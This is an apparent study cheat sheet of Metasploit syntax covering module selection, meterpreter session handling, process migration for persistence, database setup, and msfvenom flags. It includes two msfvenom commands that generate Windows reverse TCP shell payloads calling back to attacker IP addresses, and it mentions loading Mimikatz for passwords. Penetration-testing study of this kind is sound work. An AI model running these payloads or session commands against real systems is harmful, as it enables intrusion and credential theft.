Metasploit Command Syntax
Metasploit or the Metasploit Framework is a tool that is used to develop and execute exploit code agains remote target machines. Since this tool is very large, a separate document for its commands seemed appropriate.
Table of Contents
- Main commands to use MetaSploit
- Other usefull commands
- Metasploit Modules
- MSFVenom Commands
- Database/workspaces
[!NOTE] Some of these commands can only be used after a (meterpreter) shell has been made to another machine. These will be marked with a đ˛. Others must be used outside of these shells.
Main commands to use MetaSploit
search > Look for a module to use
use > Load the specific module
options > View any options you need to set
set <options> > Set the specified option
run > Run the exploit
exploit > Run the exploit
Other usefull commands
đ˛ Information gathering
getuid > Get the current user
getprivs > Get the priveleges for the current user
sysinfo > Get info on the system
đ˛ Kiwi/Mimikatz can be loaded into the session
đ˛ Menu, go back to from session
đ˛ Move/migrate to another process (for priveleges)
đ˛ Passwords
Payloads
show payloads > When a module is selected it will list compatible payloads
set payload <id> > Selects the listed payload with the corresponding number.
set payload <name> > Selects the payload with the corresponding name.
đ˛ Privelege escalataion (for Windows at least)
đ˛ Quiting or closing a session
Search exploits
use post/multi/recon/local_exploit_suggester > Can be used to find any vulnerabilities on the system. Does need an active session.
Searching for modules
Sessions
sessions > show all
sessions -i <id> > select and go to session
sessions -u > upgrade shel to meterpreter shell
sessions -k <id> > kill selected session
đ˛ Shell creation after exploiting
Shell conversion to Meterpreter
Show various possibilities (payloads/exploits etc.)
Metasploit Modules
Some usefull modules that can be used in Metasploit.
run post/windows/manage/migrate
> Run the migrate module that can be used to inject into another process to create persistence
MSFVenom Commands
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.18.78.136 LPORT=443 -b '\x0a\x0d\x00' -f c
> Creates a unstaged reverse TCP shell in c format, to be used on a 32-bit windows system.
> Attack host IP and port are also included.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe
> Creates an unstaged reverse TCP shell in exe format to be used on a 64-bit windows system.
> Attack host IP and port are also included as well as an output name.
| đ° msfvenom argument | âšī¸ Function |
|---|---|
-a |
Specifies an architecture type of the machine the payload will be used |
-p |
Specifies the payload (type) to be used |
--platform |
Specifies the platform of the machine the payload will be used |
-l / --list formats |
Show all available formats |
-l / --list payloads |
Show all available payloads |
-e |
Specifies the encoding format |
-f |
Specifies the output format (extension) |
-o |
Specifies the output location |
-b |
A list of characters to avoid |
Database/workspaces
Outside of Metasploit
systemctl start postgresql > Start postgreSQL used by Metasploit
sudo msfdb init > start Metasploit database